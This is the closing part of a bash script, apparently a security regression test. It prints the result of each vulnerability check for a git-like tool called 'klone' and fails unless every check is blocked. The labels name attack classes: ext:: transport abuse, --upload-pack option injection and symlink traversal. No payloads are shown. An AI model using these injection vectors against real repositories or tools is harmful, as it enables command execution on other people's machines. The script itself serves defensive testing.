printf '  %-32s : %s\n' "VC-53817 (ext:: transport)"       "$RESULT_53817_ext"
printf '  %-32s : %s\n' "VC-53817 (--upload-pack)"         "$RESULT_53817_optinject"
printf '  %-32s : %s\n' "VC-53816 (symlink traversal)"     "$RESULT_53816"
echo
if [[ "${KEEP_SANDBOX:-0}" == "1" ]]; then
    echo "Sandbox preserved at: $WORK"
fi

# Exit 0 iff klone is verified to block every demonstrable CVE.
# INCONCLUSIVE (host can't trigger the bug) is acceptable; BLOCKED_BY_HOST
# (host blocked it but not klone) is not — it means the fix wasn't proven.
exit_code=0
for r in "$RESULT_53818" "$RESULT_53817_ext" "$RESULT_53817_optinject" "$RESULT_53816"; do
    case "$r" in
        BLOCKED|INCONCLUSIVE) ;;
        VULNERABLE)          exit_code=1 ;;
        BLOCKED_BY_HOST)     exit_code=1 ;;
        *)                   exit_code=1 ;;
    esac
done
exit "$exit_code"
```

</details>
